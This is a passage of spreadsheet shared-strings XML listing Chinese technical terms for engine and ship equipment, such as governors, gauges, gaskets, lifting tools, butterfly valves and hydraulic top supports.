    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电子调速器速度传感器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电子调速器系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电子温度表</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电子温度调节计</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电子系统文件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电子压力表</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电子压力计</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电子仪表，主机控制</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电子仪器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电子元件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电子元件失败故障排除</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电子元件说明</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电阻温度计</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电阻温度计</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Pt100</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>垫</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>垫，空冷器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>垫，空冷器（空气）</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>垫片，泵套筒</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>垫片，导轨</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>垫片，缸体</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气箱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>垫片，曲柄销轴承</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>垫片，轴承</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>垫片</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封圈</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>.O</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>形圈</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>垫片包</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>过滤器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>垫片布置</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>垫片材料</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>垫片环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>垫片销</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油冷却器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>垫片</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>硬化的</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>垫圈</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊车检修工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊车梁</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊车梁安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊带</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊带防护垫</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊带摩擦装置</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊耳</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊杆</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊高工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊环螺钉</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-X</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排烟管首段</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排烟管尾段</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排烟管中部</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排烟管总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴首段</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴尾段</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊具试验</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊装工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊装工具，主轴承盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊装工具安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊装工具底座</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊装工具枷锁</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊装工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊装工具适配器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊装工具用螺塞</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊装工具用螺栓</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊装螺栓</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊装设备</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊装说明书</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊装用阀盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊装装置用测试装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>蝶阀，</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>ICS</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷水</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>蝶阀阀板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>蝶阀规程</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>蝶阀壳体</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>蝶阀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>明细</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>蝶阀数据</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>蝶形螺栓</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶部</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶部部件导轨</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶部吊具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶部护板安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶部机械支撑准备</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶部清洗</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶部液压支撑布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶部液压支撑系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶部液压支撑准备</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶部液压阻尼器布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶部液压阻尼系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶部支撑</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶部支撑</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶部支撑工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶部支撑链接</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶部支撑</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>蓄压器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶部支撑液压千斤顶</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶部支撑</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压系统</t>
    </r>
